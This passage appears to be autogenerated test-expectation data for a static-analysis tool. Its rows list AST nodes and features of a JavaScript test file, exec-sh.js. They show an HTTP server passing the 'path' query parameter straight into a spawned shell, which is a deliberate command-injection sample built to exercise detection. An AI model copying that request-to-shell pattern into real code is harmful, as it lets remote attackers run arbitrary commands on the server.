contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:25 | shell | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:25 | shell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:25 | shell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:29 | shell.cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:27:15:29 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:27:15:29 | cmd | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:27:15:29 | cmd | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:27:15:29 | cmd | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:27:15:29 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:32:15:51 | [shell.arg, command] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:37 | shell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:37 | shell | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:37 | shell | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:37 | shell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:37 | shell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:33:15:41 | shell.arg | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:39:15:41 | arg | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:39:15:41 | arg | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:39:15:41 | arg | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:39:15:41 | arg | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:39:15:41 | arg | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:54:15:60 | options | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:18:4 | http | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:18:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:18:4 | http | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:18:17 | http.createServer | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:18:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:18:17 | http.createServer | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | exceptional return of http.cr ... md);\\n}) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | exceptional return of http.cr ... md);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | exceptional return of http.cr ... md);\\n}) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | http.cr ... md);\\n}) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | http.cr ... md);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:1:21:2 | http.cr ... md);\\n}) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:6:18:17 | createServer | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:6:18:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:6:18:17 | createServer | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | execSh | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | execSh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | this | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:18:18 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | 'arguments' object of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | exceptional return of anonymous function | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | exceptional return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | exceptional return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | functio ... cmd);\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | return of anonymous function | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:19:21:1 | return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:29:18:31 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:34:18:36 | res | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:34:18:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:34:18:36 | res | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:34:18:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:18:34:18:36 | res | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:11 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:11 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:11 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:11 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:11 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd = u ... ry.path | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd = u ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd = u ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd = u ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:9:19:49 | cmd = u ... ry.path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:17 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:17 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:17 | url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:17 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:17 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:23 | url.parse | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:23 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:23 | url.parse | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:23 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:23 | url.parse | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | exceptional return of url.par ... , true) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | exceptional return of url.par ... , true) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:38 | url.par ... , true) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:44 | url.par ... ).query | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:44 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:44 | url.par ... ).query | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:44 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:44 | url.par ... ).query | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:49 | url.par ... ry.path | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:49 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:49 | url.par ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:49 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:15:19:49 | url.par ... ry.path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:19:19:23 | parse | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:19:19:23 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:19:19:23 | parse | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:19:19:23 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:19:19:23 | parse | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:27 | req | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:27 | req | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:27 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:27 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | req.url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:19:25:19:31 | 